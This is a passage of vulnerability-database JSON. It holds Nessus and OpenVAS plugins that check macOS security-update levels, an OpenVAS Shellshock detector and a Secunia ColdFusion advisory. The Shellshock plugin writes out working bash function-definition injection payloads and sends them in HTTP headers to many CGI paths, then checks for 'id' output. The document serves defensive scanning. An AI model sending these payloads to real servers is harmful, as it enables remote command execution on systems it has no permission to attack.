local_var p_split = split(patch, sep:\"-\");\n local_var p_year = int( p_split[0]);\n local_var p_num = int( p_split[1]);\n\n if (year > p_year) return TRUE;\n else if (year < p_year) return FALSE;\n else if (number >= p_num) return TRUE;\n else return FALSE;\n}\n\nget_kb_item_or_exit(\"Host/local_checks_enabled\");\nos = get_kb_item_or_exit(\"Host/MacOSX/Version\");\n\nif (!preg(pattern:\"Mac OS X 10\\.(11\\.6|12\\.6)([^0-9]|$)\", string:os))\n audit(AUDIT_OS_NOT, \"Mac OS X 10.11.6 or Mac OS X 10.12.6\");\n\nif (\"10.11.6\" >< os)\n patch = \"2017-005\";\nelse\n patch = \"2017-002\";\n\npackages = get_kb_item_or_exit(\"Host/MacOSX/packages/boms\", exit_code:1);\nsec_boms_report = pgrep(\n pattern:\"^com\\.apple\\.pkg\\.update\\.(security\\.|os\\.SecUpd).*bom$\",\n string:packages\n);\nsec_boms = split(sec_boms_report, sep:'\\n');\n\nforeach package (sec_boms)\n{\n # Grab patch year and number\n match = pregmatch(pattern:\"[^0-9](20[0-9][0-9])[-.]([0-9]{3})[^0-9]\", string:package);\n if (empty_or_null(match[1]) || empty_or_null(match[2]))\n continue;\n\n patch_found = check_patch(year:int(match[1]), number:int(match[2]));\n if (patch_found) exit(0, \"The host has Security Update \" + patch + \" or later installed and is therefore not affected.\");\n}\n\nreport = '\\n Missing security update : ' + patch;\nreport += '\\n Installed security BOMs : ';\nif (sec_boms_report) report += str_replace(find:'\\n', replace:'\\n ', string:sec_boms_report);\nelse report += 'n/a';\nreport += '\\n';\n\nsecurity_report_v4(port:0, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:48:24", "bulletinFamily": "scanner", "description": "The remote host is running a version of Mac OS X that is 10.13.x\nprior to 10.13.2. It is, therefore, affected by multiple\nvulnerabilities in the following components :\n\n - apache\n - curl\n - Directory Utility\n - IOAcceleratorFamily\n - IOKit\n - Intel Graphics Driver\n - Kernel\n - Mail\n - Mail Drafts\n - OpenSSL\n - Screen Sharing Server\n\nNote that successful exploitation of the most serious issues can\nresult in arbitrary code execution.", "modified": "2019-11-02T00:00:00", "id": "MACOS_10_13_2.NASL", "href": "https://www.tenable.com/plugins/nessus/105080", "published": "2017-12-07T00:00:00", "title": "macOS 10.13.x < 10.13.2 Multiple Vulnerabilities (Meltdown)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105080);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/06/19 15:17:43\");\n\n script_cve_id(\n \"CVE-2017-1000254\",\n \"CVE-2017-13847\",\n \"CVE-2017-13848\",\n \"CVE-2017-13855\",\n \"CVE-2017-13858\",\n \"CVE-2017-13860\",\n \"CVE-2017-13862\",\n \"CVE-2017-13865\",\n \"CVE-2017-13867\",\n \"CVE-2017-13868\",\n \"CVE-2017-13869\",\n \"CVE-2017-13871\",\n \"CVE-2017-13872\",\n \"CVE-2017-13875\",\n \"CVE-2017-13876\",\n \"CVE-2017-13878\",\n \"CVE-2017-13883\",\n \"CVE-2017-13886\",\n \"CVE-2017-13887\",\n \"CVE-2017-13892\",\n \"CVE-2017-13904\",\n \"CVE-2017-13905\",\n \"CVE-2017-13911\",\n \"CVE-2017-15422\",\n \"CVE-2017-3735\",\n \"CVE-2017-5754\",\n \"CVE-2017-7151\",\n \"CVE-2017-7154\",\n \"CVE-2017-7155\",\n \"CVE-2017-7158\",\n \"CVE-2017-7159\",\n \"CVE-2017-7162\",\n \"CVE-2017-7163\",\n \"CVE-2017-7171\",\n \"CVE-2017-7172\",\n \"CVE-2017-7173\",\n \"CVE-2017-9798\"\n );\n script_bugtraq_id(\n 100515,\n 100872,\n 101115,\n 101981,\n 102097,\n 102098,\n 102099,\n 102100,\n 102378,\n 103134,\n 103135\n );\n script_xref(name:\"IAVA\", value:\"2018-A-0019\");\n\n script_name(english:\"macOS 10.13.x < 10.13.2 Multiple Vulnerabilities (Meltdown)\");\n script_summary(english:\"Checks the version of Mac OS X / macOS.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS update that fixes multiple security\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Mac OS X that is 10.13.x\nprior to 10.13.2. It is, therefore, affected by multiple\nvulnerabilities in the following components :\n\n - apache\n - curl\n - Directory Utility\n - IOAcceleratorFamily\n - IOKit\n - Intel Graphics Driver\n - Kernel\n - Mail\n - Mail Drafts\n - OpenSSL\n - Screen Sharing Server\n\nNote that successful exploitation of the most serious issues can\nresult in arbitrary code execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208331\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208394\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to macOS version 10.13.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-7172\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mac OS X Root Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/OS\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os)\n{\n os = get_kb_item_or_exit(\"Host/OS\");\n if (\"Mac OS X\" >!< os) audit(AUDIT_OS_NOT, \"macOS / Mac OS X\");\n\n c = get_kb_item(\"Host/OS/Confidence\");\n if (c <= 70) exit(1, \"Can't determine the host's OS with sufficient confidence.\");\n}\nif (!os) audit(AUDIT_OS_NOT, \"macOS / Mac OS X\");\n\nmatches = pregmatch(pattern:\"Mac OS X ([0-9]+(\\.[0-9]+)+)\", string:os);\nif (empty_or_null(matches)) exit(1, \"Failed to parse the macOS / Mac OS X version ('\" + os + \"').\");\n\nversion = matches[1];\nfixed_version = \"10.13.2\";\n\nif (version !~\"^10\\.13($|[^0-9])\")\n audit(AUDIT_OS_NOT, \"macOS 10.13.x\");\n\nif (ver_compare(ver:version, fix:'10.13.2', strict:FALSE) == -1)\n{\n security_report_v4(\n port:0,\n severity:SECURITY_HOLE,\n extra:\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version +\n '\\n'\n );\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"macOS / Mac OS X\", version);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:34:40", "bulletinFamily": "scanner", "description": "This host is installed with Apple Mac OS X\n and is prone to multiple vulnerabilities.", "modified": "2019-03-18T00:00:00", "published": "2017-12-07T00:00:00", "id": "OPENVAS:1361412562310812401", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812401", "title": "Apple MacOSX Security Updates(HT208331)-02", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apple_macosx_HT208331_02.nasl 14295 2019-03-18 20:16:46Z cfischer $\n#\n# Apple MacOSX Security Updates(HT208331)-02\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812401\");\n script_version(\"$Revision: 14295 $\");\n script_cve_id(\"CVE-2017-13868\", \"CVE-2017-13869\", \"CVE-2017-3735\", \"CVE-2017-13855\",\n\t\t\"CVE-2017-13844\", \"CVE-2017-9798\", \"CVE-2017-13847\", \"CVE-2017-13833\",\n\t\t\"CVE-2017-10002\", \"CVE-2017-13867\", \"CVE-2017-13862\", \"CVE-2017-7172\",\n \"CVE-2017-1000254\", \"CVE-2017-15422\", \"CVE-2017-7159\", \"CVE-2017-7162\",\n \"CVE-2017-13904\", \"CVE-2017-7173\", \"CVE-2017-7154\");\n script_bugtraq_id(100515, 100872, 101946);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 21:16:46 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-07 10:51:36 +0530 (Thu, 07 Dec 2017)\");\n script_name(\"Apple MacOSX Security Updates(HT208331)-02\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple Mac OS X\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The Security update includes,\n\n - A validation issue was addressed with improved input sanitization.\n\n - An out-of-bounds read issue existed in X.509 IPAddressFamily parsing.\n\n - A type confusion issue was addressed with improved memory handling.\n\n - A memory corruption issue was addressed with improved memory handling.\n\n - Multiple issues were addressed by updating to version 2.4.28.\n\n - Multiple memory corruption issues were addressed through improved state management.\n\n - An out-of-bounds read was addressed with improved bounds checking.\n\n - An out-of-bounds read issue existed in the FTP PWD response parsing.\n\n - An integer overflow error.\n\n - An input validation issue existed in the kernel.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to read restricted memory, execute arbitrary code with system\n privileges.\");\n\n script_tag(name:\"affected\", value:\"Apple Mac OS X versions,\n 10.13.x through 10.13.1, 10.12.x through 10.12.6, 10.11.x through 10.11.6\");\n\n script_tag(name:\"solution\", value:\"Apply the appropriate security patch from\n the reference links.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT208331\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.1[1-3]\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName)\n exit(0);\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer || osVer !~ \"^10\\.1[1-3]\" || \"Mac OS X\" >!< osName){\n exit(0);\n}\n\nbuildVer = get_kb_item(\"ssh/login/osx_build\");\n\nif(osVer =~ \"^10\\.11\")\n{\n if(version_in_range(version:osVer, test_version:\"10.11\", test_version2:\"10.11.5\")){\n fix = \"Upgrade to latest OS release and apply patch from vendor\";\n }\n\n else if(osVer == \"10.11.6\")\n {\n if(osVer == \"10.11.6\" && version_is_less(version:buildVer, test_version:\"15G18013\"))\n {\n fix = \"Apply patch from vendor\";\n osVer = osVer + \" Build \" + buildVer;\n }\n }\n}\n\nif(osVer =~ \"^10\\.12\")\n{\n if(version_in_range(version:osVer, test_version:\"10.12\", test_version2:\"10.12.5\")){\n fix = \"Upgrade to latest OS release and apply patch from vendor\";\n }\n\n else if(osVer == \"10.12.6\")\n {\n if(osVer == \"10.12.6\" && version_is_less(version:buildVer, test_version:\"16G1114\"))\n {\n fix = \"Apply patch from vendor\";\n osVer = osVer + \" Build \" + buildVer;\n }\n }\n}\n\nelse if(osVer == \"10.13.1\"){\n fix = \"10.13.2\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:osVer, fixed_version:fix);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-03T16:39:49", "bulletinFamily": "scanner", "description": "This host is installed with GNU Bash Shell\n and is prone to remote command execution vulnerability.", "modified": "2019-12-03T00:00:00", "published": "2014-09-25T00:00:00", "id": "OPENVAS:1361412562310804489", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804489", "title": "GNU Bash Environment Variable Handling Shell Remote Command Execution Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# GNU Bash Environment Variable Handling Shell Remote Command Execution Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804489\");\n script_version(\"2019-12-03T08:19:10+0000\");\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-6278\");\n script_bugtraq_id(70103);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-03 08:19:10 +0000 (Tue, 03 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-09-25 18:47:16 +0530 (Thu, 25 Sep 2014)\");\n script_name(\"GNU Bash Environment Variable Handling Shell Remote Command Execution Vulnerability\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"http_version.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_add_preference(name:\"Shellshock: Check CGIs in KB:\", type:\"checkbox\", value:\"no\");\n\n script_xref(name:\"URL\", value:\"https://access.redhat.com/solutions/1207723\");\n script_xref(name:\"URL\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1141597\");\n script_xref(name:\"URL\", value:\"https://blogs.akamai.com/2014/09/environment-bashing.html\");\n script_xref(name:\"URL\", value:\"https://community.qualys.com/blogs/securitylabs/2014/09/24/\");\n script_xref(name:\"URL\", value:\"http://www.gnu.org/software/bash/\");\n\n script_tag(name:\"summary\", value:\"This host is installed with GNU Bash Shell\n and is prone to remote command execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted command via HTTP GET\n request and check remote command execution.\");\n\n script_tag(name:\"insight\", value:\"GNU bash contains a flaw that is triggered\n when evaluating environment variables passed from another environment. After\n processing a function definition, bash continues to process trailing strings.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n or local attackers to inject shell commands, allowing local privilege\n escalation or remote command execution depending on the application vector.\");\n\n script_tag(name:\"affected\", value:\"GNU Bash through 4.3.\");\n\n script_tag(name:\"solution\", value:\"Apply the patch or upgrade to latest version.\");\n\n script_timeout(600);\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"misc_func.inc\");\n\ncgis = make_list();\ncgis[i++] = '/';\ncgis[i++] = '/cgi-bin/authLogin.cgi';\ncgis[i++] = '/cgi-bin/restore_config.cgi';\ncgis[i++] = '/cgi-bin/index.cgi';\ncgis[i++] = '/dasdec/dasdec.csp';\ncgis[i++] = '/status';\ncgis[i++] = '/cgi-bin/status';\ncgis[i++] = '/index.php';\ncgis[i++] = '/login.php';\ncgis[i++] = '/test.cgi.php';\ncgis[i++] = '/test_cgi.php';\ncgis[i++] = '/cgi-bin/server.php';\ncgis[i++] = '/index.pl';\ncgis[i++] = '/login.pl';\ncgis[i++] = '/test.cgi.pl';\ncgis[i++] = '/test_cgi.pl';\ncgis[i++] = '/test.cgi';\ncgis[i++] = '/cgi-bin/php.fcgi';\ncgis[i++] = '/cgi-bin/info.sh';\ncgis[i++] = '/cgi-bin/info.cgi';\ncgis[i++] = '/cgi-bin/env.cgi';\ncgis[i++] = '/cgi-bin/environment.cgi';\ncgis[i++] = '/cgi-bin/test.sh';\ncgis[i++] = '/cgi-bin/test';\ncgis[i++] = '/cgi-bin/php';\ncgis[i++] = '/cgi-bin/php5';\ncgis[i++] = '/cgi-sys/php5';\ncgis[i++] = '/cgi-bin/php-cgi';\ncgis[i++] = '/cgi-bin/printenv';\ncgis[i++] = '/cgi-bin/php.cgi';\ncgis[i++] = '/cgi-bin/php4';\ncgis[i++] = '/cgi-bin/test-cgi';\ncgis[i++] = '/cgi-bin/test.cgi';\ncgis[i++] = '/cgi-bin/test.cgi.pl';\ncgis[i++] = '/cgi-bin/test-cgi.pl';\ncgis[i++] = '/cgi-bin/cgiinfo.cgi';\ncgis[i++] = '/cgi-bin/login.cgi';\ncgis[i++] = '/cgi-bin/test.cgi.php';\ncgis[i++] = '/cgi-sys/entropysearch.cgi';\ncgis[i++] = '/cgi-sys/defaultwebpage.cgi';\ncgis[i++] = '/cgi-sys/FormMail-clone.cgi';\ncgis[i++] = '/cgi-bin/search';\ncgis[i++] = '/cgi-bin/search.cgi';\ncgis[i++] = '/cgi-bin/whois.cgi';\ncgis[i++] = '/cgi-bin/viewcvs.cgi';\ncgis[i++] = '/cgi-mod/index.cgi';\ncgis[i++] = '/cgi-bin/test.py';\ncgis[i++] = '/cgi-bin/cgitest.py';\ncgis[i++] = '/cgi-bin/ruby.rb';\ncgis[i++] = '/cgi-bin/ezmlm-browse';\ncgis[i++] = '/cgi-bin-sdb/printenv';\ncgis[i++] = '/cgi-bin/welcome';\ncgis[i++] = '/cgi-bin/helpme';\ncgis[i++] = '/cgi-bin/his';\ncgis[i++] = '/cgi-bin/hi';\ncgis[i++] = '/cgi_wrapper';\ncgis[i++] = '/admin.cgi';\ncgis[i++] = '/administrator.cgi';\ncgis[i++] = '/cgi-bin/guestbook.cgi';\ncgis[i++] = '/tmUnblock.cgi';\ncgis[i++] = '/phppath/php';\ncgis[i++] = '/cgi-bin/sysinfo.pl';\ncgis[i++] = '/cgi-bin/pathtest.pl';\ncgis[i++] = '/cgi-bin/contact.cgi';\ncgis[i++] = '/cgi-bin/uname.cgi';\ncgis[i++] = '/cgi-bin/jarrewrite.sh';\n\nfunction _check( url, port, host, useragent, vt_string ) {\n\n local_var url, port, host, useragent, vt_string;\n local_var attacks, attack, method, http_field, req, res, uid, report;\n\n attacks = make_list( '() { ' + vt_string + ':; }; echo Content-Type: text/plain; echo; echo; PATH=/usr/bin:/usr/local/bin:/bin; export PATH; id;',\n '() { _; ' + vt_string + '; } >_[$($())] { echo Content-Type: text/plain; echo; echo; PATH=/usr/bin:/usr/local/bin:/bin; export PATH; id; }' );\n\n foreach attack( attacks ) {\n foreach method( make_list( \"GET\", \"POST\") ) {\n foreach http_field( make_list( \"User-Agent: \", \"Referer: \", \"Cookie: \", vt_string + \": \" ) ) {\n\n req = string( method, \" \", url, \" HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\" );\n\n if( \"User-Agent\" >!< http_field )\n req += string( \"User-Agent: \", useragent, \"\\r\\n\" );\n\n req += string( http_field, attack, \"\\r\\n\",\n \"Connection: close\\r\\n\",\n \"Accept: */*\\r\\n\\r\\n\" );\n res = http_send_recv( port:port, data:req );\n\n if( res && res =~ \"uid=[0-9]+\\(.*gid=[0-9]+\\(.*\" ) {\n uid = eregmatch( pattern:\"(uid=[0-9]+.*gid=[0-9]+[^ ]+)\", string:res );\n\n report = 'By requesting the URL \"' + url + '\" with the \"' + http_field + '\" header set to\\n\"' +\n attack + '\"\\nit was possible to execute the \"id\" command.\\n\\nResult: ' + uid[1];\n expert_info = 'Request:\\n'+ req + 'Response:\\n' + res + '\\n';\n security_message( port:port, data:report, expert_info:expert_info );\n exit( 0 );\n }\n }\n }\n }\n}\n\nfunction add_files( extensions ) {\n\n local_var extensions;\n local_var ext, known, e, x;\n\n foreach ext( extensions ) {\n known = FALSE;\n\n if( \"-\" >< ext ) {\n e = split( ext, sep:\" - \", keep:FALSE );\n if( isnull( e[0] ) )\n continue;\n ext = e[0];\n ext = chomp( ext );\n }\n\n for( x = 0; x < max_index( cgis ); x++ ) {\n if( ext == cgis[x])\n known = TRUE;\n }\n\n if( ereg( pattern:\"\\.(js|css|gif|png|jpeg|jpg|pdf|ico)$\", string:tolower( ext ) ) )\n continue;\n\n if( ! known )\n cgis[i++] = ext;\n }\n}\n\ncheck_kb_cgis = script_get_preference( \"Shellshock: Check CGIs in KB:\" );\n\nport = get_http_port( default:80 );\n\nif( check_kb_cgis == \"yes\" ) {\n # nb: This is expected to be here, we're using the same call later to add the port to the host header...\n host = http_host_name( dont_add_port:TRUE );\n extensions = http_get_kb_file_extensions( port:port, host:host, ext:\"*\" );\n if( extensions )\n add_files( extensions:extensions );\n\n kb_cgis = http_get_kb_cgis( port:port, host:host );\n if( kb_cgis )\n add_files( extensions:kb_cgis );\n}\n\nuseragent = http_get_user_agent();\nvtstrings = get_vt_strings();\nvt_string = vtstrings[\"default\"];\nhost = http_host_name( port:port );\n\nforeach dir( cgis ) {\n _check( url:dir, port:port, host:host, useragent:useragent, vt_string:vt_string );\n}\n\nexit( 99 );\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:18", "bulletinFamily": "software", "description": "\r\n----------------------------------------------------------------------\r\n\r\nHardcore Disassembler / Reverse Engineer Wanted!\r\n\r\nWant to work with IDA and BinDiff?\r\nWant to write PoC's and Exploits?\r\n\r\nYour nationality is not important.\r\nWe will get you a work permit, find an apartment, and offer a\r\nrelocation compensation package.\r\n\r\nhttp://secunia.com/hardcore_disassembler_and_reverse_engineer/\r\n\r\n----------------------------------------------------------------------\r\n\r\nTITLE:\r\nColdFusion AdminAPI Authentication Bypass\r\n\r\nSECUNIA ADVISORY ID:\r\nSA21421\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/21421/\r\n\r\nCRITICAL:\r\nLess critical\r\n\r\nIMPACT:\r\nSecurity Bypass\r\n\r\nWHERE:\r\nLocal system\r\n\r\nSOFTWARE:\r\nMacromedia ColdFusion MX 7\r\nhttp://secunia.com/product/4984/\r\n\r\nDESCRIPTION:\r\nA security issue has been reported in ColdFusion, which can be\r\nexploited by malicious, local users to bypass certain security\r\nrestrictions.\r\n\r\nThe security issue is caused due to missing authentication checks in\r\ncertain methods, which call the AdminAPI API. This can be exploited\r\nto access certain ColdFusion Administrator functionality.\r\n\r\nThe security issue has been reported in versions 7.02 and prior for\r\nthe 7.x branch.\r\n\r\nSOLUTION:\r\nApply patch.\r\nhttp://www.adobe.com/support/coldfusion/ts/documents/287ec799/hf702-apsb06-10.zip\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\nReported by the vendor.\r\n\r\nORIGINAL ADVISORY:\r\nAdobe Systems:\r\nhttp://www.adobe.com/support/security/bulletins/apsb06-10.html\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.\r\n", "modified": "2006-08-10T00:00:00", "published": "2006-08-10T00:00:00", "id": "SECURITYVULNS:DOC:13847", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13847", "title": "[SA21421] ColdFusion AdminAPI Authentication Bypass", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:21", "bulletinFamily": "software", "description": "Some AdminAPI API functionality is available without authentication.", "modified": "2006-08-10T00:00:00", "published": "2006-08-10T00:00:00", "id": "SECURITYVULNS:VULN:6480", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:6480", "title": "Macromedia ColdFusion authentication bypass", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}